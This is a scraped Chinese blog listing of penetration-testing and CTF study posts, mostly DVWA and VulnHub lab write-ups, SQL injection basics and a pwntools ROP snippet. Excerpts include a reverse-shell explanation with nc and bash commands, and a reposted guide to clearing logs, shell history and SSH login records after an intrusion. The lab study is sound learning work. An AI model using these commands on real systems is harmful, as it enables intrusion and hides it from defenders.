自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(43)
  • 收藏
  • 关注

原创 封神台SQL注入-基础靶场1-Head注入

1111

2020-10-10 16:11:18 71

原创 封神台SQL注入-基础靶场1-布尔盲注

1

2020-10-09 10:25:19 76

原创 VulnHub渗透测试-Bulldog2

文章目录渗透步骤一、主机发现、端口扫描二、Web扫描、漏洞发现三、漏洞利用、GetShell四、权限提升,得到Flag五、种植后门、清理痕迹渗透步骤一、主机发现、端口扫描//主机发现root@kali:~# ifconfigroot@kali:~# nmap -sn 192.168.56.1/24//端口扫描,获取服务、系统版本信息root@kali:~# nmap -sV -O 192.168.56.104//目录扫描root@kali:~# dirb http://192.168.

2020-09-30 09:56:11 26

转载 Linux 入侵痕迹清理技巧

文章目录01、清除history历史命令记录02、清除系统日志痕迹03、清除web入侵痕迹04、文件安全删除工具05、隐藏远程SSH登陆记录在攻击结束后,如何不留痕迹的清除日志和操作记录,以掩盖入侵踪迹,这其实是一个细致的技术活。你所做的每一个操作,都要被抹掉;你所上传的工具,都应该被安全地删掉。01、清除history历史命令记录查看历史操作命令:查看历史操作命令:historyhistory记录文件:more ~/.bash_history第一种方式:(1)编辑history记录文件,

2020-09-30 09:54:42 56

转载 nmap基本使用方法

1、nmap简单扫描nmap默认发送一个ARP的PING数据包,来探测目标主机1-10000范围内所开放的所有端口命令语法: nmap <target ip address>其中:target ip address是扫描的目标主机的ip地址例子:nmap 173.22.90.10[root@docker-node4 ~]# nmap 173.22.90.10PORT STATE SERVICE22/tcp open ssh 80/tcp open http111

2020-09-29 10:30:24 35

转载 linux反弹shell命令解析

文章目录1. 什么是反弹shell2. 反弹shell的用途3. 反弹shell操作步骤4. 原理1. 什么是反弹shell简单来说就是A主机可以通过执行B主机上的命令并且把返回值都返回到A上。2. 反弹shell的用途这个反弹shell大部分用途是用来侵入别人的主机。就是因为感觉很厉害的样子,所以才来研究这家伙3. 反弹shell操作步骤3.1. 在本机开启端口9090nc -lk 90903.2. 在需要被控制的机器上执行如下两种命令中的一种即可bash -i >& /

2020-09-29 10:19:56 71

转载 BurpSuite系列----Proxy模块(代理模块)

文章目录一、简介二、模块说明1.Intercept2.HTTP History3.WebSockets history4.Options一、简介Proxy代理模块作为BurpSuite的核心功能,拦截HTTP/S的代理服务器,作为一个在浏览器和目标应用程序之间的中间人,允许你拦截,查看,修改在两个方向上的原始数据流。Burp 代理允许你通过监视和操纵应用程序传输的关键参数和其他数据来查找和探索应用程序的漏洞。通过以恶意的方式修改浏览器的请求,Burp 代理可以用来进行攻击,如:SQL 注入,cooki

2020-09-29 09:00:54 55

原创 封神台SQL注入-基础靶场1-显错注入

一、显错注入Pass-01判断注入类型id=1 //有回显id=1' // No results found 判断为数字型注入判断有几列id=1 order by 3 //有回显id=1 order by 4 // No results found 判断有三列判断回显点id=1 union select 1,2,3...

2020-09-28 10:25:06 71

转载 sql注入中关于“--+“,“--“和“#“

使用#号有时发现执行的sql语句中没有#号原因是url中#号是用来指导浏览器动作的(例如锚点),对服务器端完全无用。所以,HTTP请求中不包括#将#号改成url的编码%23就可以了使用--和使用--+这里发现+号在语句中变成了空格。用来和后面的单引号分隔开,将后面的语句注释。了解原理后便知道了--无法使用的原因,是因为--与后面的单引号连接在一起,无法形成有效的mysql语句。在mysql中使用这个语句分析原因,输入后回车显示分号没有闭合所以在注入时我们除了使用--+

2020-09-28 10:04:04 84

转载 如何判断是字符型注入还是数字型注入

前言通常sql 注入漏洞会被分为2种类型数值型字符型其实所有产生类型都是数据库本身表产生的,在我们创建的时候会发现其后面总有个数据类型限制,而不同的数据库有不同的数据类型,不管我们怎么分常用的数据类型总是以数值和字符来进行区分的。如何区分1)数字型当输入的参数x为整型的时候,通常sql语句是这样的select * from users where id =x这种类型可以使用经典的and 1=1 and 1=2来判断url地址中输入www.xxxx.com/ccc.php?i

2020-09-28 09:07:15 230

原创 DVWA-JS攻击

文章目录JavaScript攻击一、Low等级二、Medium等级三、High等级Impossible等级JavaScript攻击属于Web前端安全,不存在黑盒测试的概念,直接可以对JS进行白盒代码审计。DVWA中的JavaScript攻击的场景是基于token由前端JS生成而引起的一系列问题。成功提交success,即过关一、Low等级1、漏洞分析尝试输入success,会显示invalid token生成token的源码function rot13(inp) {

2020-09-25 11:06:01 22

原创 DVWA-CSP绕过内容安全策略

文章目录CSP一、Low等级二、medium等级三、High等级四、Impossible等级CSP指HTTP返回报文头中的标签,浏览器会根据标签中的内容,判断哪些资源可以加载或执行。CSP的实质就是白名单制度,开发人员明确告诉客户端,哪些外部资源可以加载和执行。开发者只需要提供配置,实现和执行全部由浏览器完成。启用CSP通过HTTP相应头信息的Content-Security-Policy字段通过网页标签说明script-src脚本:只信任当前域名object-src:不

2020-09-25 09:31:04 35

原创 04信息搜集

1、信息搜集的思路和方法思路服务器的配置信息和网站的敏感信息域名和子域名信息目标网络系统开放的端口指纹方法网络架构系统前端后端中间键知道域名后,我们需要知道目标的注册信息DNS服务器信息注册人的联系信息获取方法whois查询:kali自带或在线查询(whois.chinaz.com)备案信息查询:https://www.tianyancha.com/Dnsenum/Layer收集子域名信息寻找真实IP判断是否存在cdn。(www.17ce.com

2020-09-24 15:04:57 28

转载 渗透测试中的端口利用

文章目录端口渗透图解详解端口渗透我们在进行渗透测试中,一般情况下会对端口进行扫描,看看服务器中开启了哪些端口,对应的端口一般存在对应的服务,而这些服务可能存在相应的漏洞,下面就是简单结束一下端口对应服务,服务可能对应的漏洞。端口渗透图解详解端口渗透文件共享端口渗透FTP服务FTP服务:ftp服务我分为两种情况,第一种是使用系统软件来配置,比如IIS中的FTP文件共享或Linux中的默认服务软件;第二种是通过第三方软件来配置,比如Serv-U还有一些网上写的简易ftp服务器等。默认端口20(

2020-09-24 11:34:39 441

原创 DVWA-XSS(Reflected+Stored)

文章目录XSS-Reflected反射型一、各等级漏洞分析及利用XSS-Stored存储型一、各等级漏洞分析及利用XSS-Reflected反射型把用户输入的数据反射给浏览器,诱使用户点击一个恶意链接,才能攻击成功。一、各等级漏洞分析及利用Low等级,没做任何过滤直接弹medium等级,过滤掉<script>,用空替换掉大小写、过滤规则漏洞利用,使用其他标签high等级,匹配一些<script>的关键字符,进一步过滤<script>

2020-09-24 10:02:05 36

原创 DVWA-XSS(DOM)G

文章目录XSS的应用场景DOM型XSS一、Low等级二、Medium等级三、High等级XSS的应用场景利用XSS获得cookie重定向钓鱼网站DDOSDOM型XSS文本对象模式xss,通过修改页面的DOM节点形成的XSS,可存储型,可反射型,只取决于输出地点。一、Low等级1、漏洞分析<?php# No protections, anything goes?> 没任何保护2.漏洞利用2.1重定向<script>window.loca

2020-09-23 16:52:30 13

原创 DVWA- Weak Session IDs 弱会话ID

文章目录弱会话ID一、Low等级二、Medium等级三、High等级四、Impossible等级弱会话ID用户访问服务器的时候,一般服务器都会分配一个身份证 session id 给用户,用于标识。一个SessionID就对应一个客户端,用户拿到session id 后就会保存到 cookies 上,之后只要拿着 cookies 再访问服务器,服务器就知道你是谁了。但是 session id 过于简单就会容易被人伪造,根本都不需要知道用户的密码就能登录服务器了。一、Low等级1、漏洞分析&l

2020-09-23 11:30:04 27

原创 DVWA-SQL Injection 注入&Sqlmap

文章目录SQL注入一、Low等级二、Medium等级三、High等级四、ImpossibleSQL注入指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。一、Low等级1、漏洞分析 <?phpif( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT

2020-09-22 15:03:26 36

原创 DVWA-Insecure CAPTCHE 不安全的验证流程

文章目录不安全的验证流程一、Low等级二、Medium等级四、impossible等级不安全的验证流程一、Low等级1、漏洞分析if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '1' ) ) { // Check CAPTCHA from 3rd party $resp = recaptcha_check_answer( $_DVWA[ 'recaptcha_private_key'],

2020-09-22 10:44:20 24

原创 DVWA-File Upload 文件上传W

文章目录文件上传一、Low等级二、Medium等级三、High等级四、Impossible文件上传由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限一、Low等级1、漏洞分析 <?phpif( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT

2020-09-21 12:47:24 25

原创 DVWA-File Inclusion 文件包含Y

文章目录文件包含一、Low等级二、Medium等级三、High等级四、Impossible等级文件包含文件包含漏洞,是指当服务器开启allow_url_include选项时,就可以通过php的某些特征性函数(incllude()、require()、include_once()、require_once()),利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致可以包含任意的文件或者任意命令执行。文件包含漏洞分为本地文件包含和远程文件包含,远程文件包含漏洞是因为开启了php配置中的

2020-09-18 17:26:02 12

原创 03Web安全后端基础-2

文章目录一、后端基础PHP二、PHP-表单验证一、后端基础PHP1、简介及基本函数php(全称超文本预处理器),是一种在服务器上执行的可免费下载使用的通用开源脚本语言。php是一种可以面向对象也可以面向过程的脚本语言使用场景网站的动态操作,如注册、登录。网站需要生成静态文件,来确保安全需要快速看见效果的项目部分游戏服务端2、PHP基本语法具有C语言、java等语言的特点脚本以<?php开头,以?>结尾变量声明,美元符开头,如$value3、网页和服务器的两

2020-09-17 14:33:05 20

原创 DVWA-CSRF 跨站请求伪造YWGZ

文章目录CSRF一、Low等级二、Mediium等级三、HighCSRF跨站请求伪造,由客户端发起,是一种劫持受信任用户向服务器发送非预期请求的攻击方式一、Low等级1、漏洞分析 // Get input $pass_new = $_GET[ 'password_new' ]; $pass_conf = $_GET[ 'password_conf' ]; // Do the passwords match? if( $pass_new == $pass_conf

2020-09-17 11:07:25 18

原创 DVWA-Command Injection 命令注入

文章目录Command Injection一、Low等级二、Medium等级三、High等级四、Impossible等级Command Injection命令注入,是指通过提交恶意构造的参数破坏命令语句结构,从而达到执行恶意命令的目的。一、Low等级1、漏洞分析<?phpif( isset( $_POST[ 'Submit' ] ) ) { // Get input $target = $_REQUEST[ 'ip' ]; // Determine OS an

2020-09-16 16:38:00 40

原创 DVWA-Brute Force爆破

目录一、Low等级二、Medium等级三、High等级一、Low等级1、漏洞分析if( isset( $_GET[ 'Login' ] ) ) { // Get username $user = $_GET[ 'username' ]; // Get password $pass = $_GET[ 'password' ]; $pass = md5( $pass ); // Check the database $query = "SELE

2020-09-16 11:34:51 21

原创 03Web安全后端基础-1

一、后端开发基础SQL1、数据库简介及SQL基本语法常见数据库SQLite(小)MYSQL、MSSQLServer(中)Oracle(大)Access、Mongodb、DB2、Sybase、Informix(不常见)基本SQL语法(1)创建数据库create database db_name charset=utf8;选择数据库use db_name创建表create table table_name(id int(11) not null primary key auto_inc

2020-09-11 14:47:55 13

原创 02web安全前端基础

## 1、什么是HTML## 2、为什么要学习HTML## 3、HTML文档的格式## 4、HTML编写环境## 5、HTML基本语法

2020-09-07 17:38:49 20

原创 01web通信原理与搭建web安全测试环境

1、C/S,B/S架构C/S:客户/服务器架构(Client/Server)B/S:浏览器/服务器架构(Brower/Server)2、网页浏览流程常识IPMAC地址域名DNSHTTP网页浏览流程用户在浏览器中输入协议://域名,如http//zzz.edu/浏览器通过系统向DNS查询域名对应的IP地址浏览器向查询到的IP地址的服务器发起http请求服务器分析http请求,从中提取并处理有用数据,处理完毕后返回一个http响应给浏览器浏览器收到服务器返回的http响应

2020-09-07 16:22:33 35

原创 虚拟机黑屏与锁定配置文件失败

虚拟机黑屏与锁定配置文件失败一、解决锁定配置失败问题 1、按“win +R”组合键,进入“运行”。 2、写入“msconfig”(不包括引号,可直接复制),按回车键。3、进入“系统配置”,选中“服务”,勾选左下角“隐藏所有Microsoft服务”,再打开“全部禁止”,打开“应用”。 4、再打开“服务”边上的“启动”选项,打开“点击任务管理器”。 5、在列出的启动项上,找到VMware点...

2019-09-19 16:09:33 90

原创 RSA--e与φ(n)不互素时

一、题目n1=0xcfc59d54b4b2e9ab1b5d90920ae88f430d39fee60d18dddbc623d15aae645e4e50db1c07a02d472b2eebb075a547618e1154a15b1657fbf66ed7e714d23ac70bdfba4c809bbb1e27687163cb09258a07ab2533568192e29a3b8e31a5de8860...

2019-07-02 17:49:50 3546

原创 trivial-实验吧

1、题目ENC(???,T0pS3cre7key) = Bot kmws mikferuigmzf rmfrxrwqe abs perudsf! Nvm kda ut ab8bv_w4ue0_ab8v_DDU求明文加密算法下载2、解题(1)读懂加密方式,下面是相关函数注解详解可自行百度sys.argv 是获取运行python文件的时候命令行参数,且以list形式存储参数key.is...

2019-06-28 12:15:11 84

原创 通过六加一认识Socket

1.网络上的两个程序通过一个双向的通讯连接实现数据的交换,这个双向链路的一端称为一个Socket。2.Socket通常用来实现客户方和服务方的连接。3.Socket是TCP/IP协议的一个十分流行的编程界面,一个Socket由一个IP地址和一个端口号唯一确定。4.Socket所支持的协议种类也不光TCP/IP一种,因此两者之间是没有必然联系的。5.在Java环境下,Socket编程主要是指...

2019-05-05 19:27:43 53

原创 Misc与Crypto短学期个人排位——20180908

题目: 提取码:题一: 1、压缩包打开,需要密码。没有其他提示,怀疑是伪加密。用winhex打开,发现没有被加密,且有点混乱。 2、怀疑压缩包被损坏,用winrar的修复功能,修复后,即可打开,发现flag (强大的360压缩,直接打开就好了)题二: 1、做过一道类似的题目,一味的认为是那种方法。以后可不能这样了,这tm可真活。 2、看题目名字,搜一下,用那个软件打开就得到fl...

2018-09-08 15:10:52 169

原创 安恒周周练15(流量分析1~4)——20180902

题目:https://pan.baidu.com/s/1139Qisn8H3TmOboj5puY9Q 提取码:bp6f题目描述 某公司内网网络被黑客渗透,简单了解,黑客首先攻击了一台web服务器,破解了后台的账户,随后利用破解的密码登录了mail系统,然后获取了vpn的申请方式,然后登录vpn,在内网pwn掉了一台打印机,请根据提供的流量包回答下列问题:过程分析: 1、攻击web服务...

2018-09-02 21:42:19 1945

原创 rop!rop!rop!——20180901

题目:https://pan.baidu.com/s/12kzsXdD2_S6RPZ07lhVMNQ 提取码:s6pz题解: 1、file rop32—&amp;gt;32位,ida—&amp;gt;无system,发现libc 废话少说上脚本from pwn import *p=process('./rop32')elf=ELF(&quot;./rop32&quot;)libc=ELF(&quot;/lib/i3...

2018-09-01 20:28:47 238

原创 pwn——20180831

Get a shell , come on !题目:https://pan.baidu.com/s/1dTE2MxfBvVYTS0MhJwj_vw 提取码:7wbc工具:题解: 1、首先file stack_3一下,32位的,gdb ./stack_3一下,run一下,输入即报错。 用ida打开,点进main函数,f5编译一下,读一下吧。 2、int __cdecl mai...

2018-09-01 09:24:05 789

原创 逆向20180829

题目:https://pan.baidu.com/s/1WcwrIZiUw3DNclN-J3lxPA 提取码:le8q工具:题解: 1、elf文件,拖进kali执行一下,权限不够?chmod 777 re0, 发现关键字wrong 2、丢进ida中,shift+F12,锁定关键字所在函数,F5反编译,由代码得 ①输入字符串长度14②经judge函数返回为真 3、 (1)进入j...

2018-08-31 13:54:09 92

原创 pwn20180830

获得最高权限练习 题目:https://pan.baidu.com/s/1hsxnKkguZRPLPZqGI_y7_Q 提取码:n70j工具:binwalk ida gdb 题解: 1、binwalk扫一下,32位的。跑一下,得到关键字。丢入ida看一下,反编译发现不管输入什么,都会输出之后结束 2、那么,这个考的是栈溢出和获取权限的知识了,首先,我们先得到s中最多能存多少...

2018-08-30 21:02:31 523

原创 misc及sql盲注--20180828

misc 由题说知识点题目1:https://pan.baidu.com/s/1bm2Bic3exMQqnRTuEuRT3g 提取码:c6sf 工具:winrar binwalk wireshark winhex 题解: 1、可以在Linux中直接打开,也可以用winrar打开。有个blue.pcap文件(第一个文件没用),用binwalk(kali里面有)-e 指令扫描发现...

2018-08-28 20:19:39 281

原创 web学习整体感知

web入门 1、常见web问题 前端:xss 后端:(典型的)sql注入,文件上传 取证:日志分析,流量分析2、学习方法 前期做题提升较快,后期投入实战较好 前期:三张图 后期:先看看人家的漏洞跟踪过程 3、大致这样,如下是前辈的忠告 web进阶 1、SSRF 2、CSRF 3、php反序列化、对象注入 4、沙箱安全 5、二次注入总之...

2018-08-27 20:48:18 113

空空如也

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人 TA的粉丝

提示
确定要删除当前文章?
取消 删除